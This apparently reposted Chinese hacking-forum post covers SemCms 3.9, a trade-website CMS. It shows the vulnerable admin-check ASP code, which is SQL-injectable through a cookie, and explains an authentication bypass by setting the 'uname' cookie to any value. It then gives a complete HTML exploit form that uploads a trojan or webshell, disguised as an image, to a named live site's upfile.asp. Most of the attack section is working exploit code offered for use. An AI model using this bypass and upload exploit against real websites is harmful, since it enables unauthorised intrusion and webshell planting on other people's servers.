SemCms （外贸企业网站管理系统）多处漏洞 & SemCms Exp

后台验证：

验证文件：Clkj_Inc\WebOut.asp

<%
if session("username")<>"" then
     Set Rs=server.createobject("adodb.recordset")
     Sql="select * from  clkj_admin  where clkj_password='"&request.cookies("userpas")("upas")&"'"
     Rs.open sql,conn,1,1
     if not (rs.eof and rs.bof) then
         session("username")=request.cookies("username")("uname")
     end if
else
     Response.Write "<script language='javascript'>alert('用户名与密码为空或失效请重新进入!');top.location.href='index.html';</script>"
end if
%>

只需要修改下 cookie username 的值 uname=任意，访问后台 Clkj_Admin\nimda_admin.asp 即可。

文件名前缀很有意思：nimda

SemCms Exp:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="backdoor.css" type="text/css" rel="stylesheet">
<script language="javascript">
<!--
function mysub()
{
		esave.style.visibility="visible";
}
-->
</script>
</head>
<body>
<form name="form1" method="post" action="http://www.borictrade.cn//Clkj_Admin//upfile.asp" enctype="multipart/form-data" >
  <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
      <TR>
        <td width=20%></td>
        <TD bgcolor=#ff0000 width="60%"><TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
            <TR>
              <td bgcolor=#ffffff align=center><font color=red>上传利用</font></td>
            </tr>
          </table></td>
        <td width=20%></td>
      </tr>
    </table>
  </div>
  <table width="95%" border="0" align="center" cellspacing="1" bgcolor="#FFFFFF">
    <tr>
      <td align="center" height="50">
	  <strong>semcms3.9上传利用exp by network QQ 378433756</strong>
        <input type="hidden" name="filepath" value="/">
        <input type="hidden" name="filelx" value="">
        <input type="hidden" name="EditName" value="">
        <input type="hidden" name="FormName" value="">
        <input type="hidden" name="act" value="uploadfile">
         </td>
    </tr>
    <tr >
      <td align="center" id="upid" height="30">                 这里写上木马名
        <input name="imgname" type="text" id="imgname" size="20" class="tx1" >
        <font color="#FF0000">//可以不写 上传完右键看源码地址。</font> </td>

    </tr>
    <tr >
      <td align="center" id="upid" height="50">选择木马~图片哦:
        <input type="file" name="file1" size="45" class="tx1" value="">
        <input type="submit" name="Submit" value="上传" onClick="javascript:mysub()">
<font color="#FF0000">//这里默认上传到根目录 大家可以再源代码filepath自定义下路径</font> </td>
      </td>
    </tr>
  </table>
</form>
</body>
</html>

摘自：http://www.90sec.org/viewthread.php?tid=3054&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

文章目录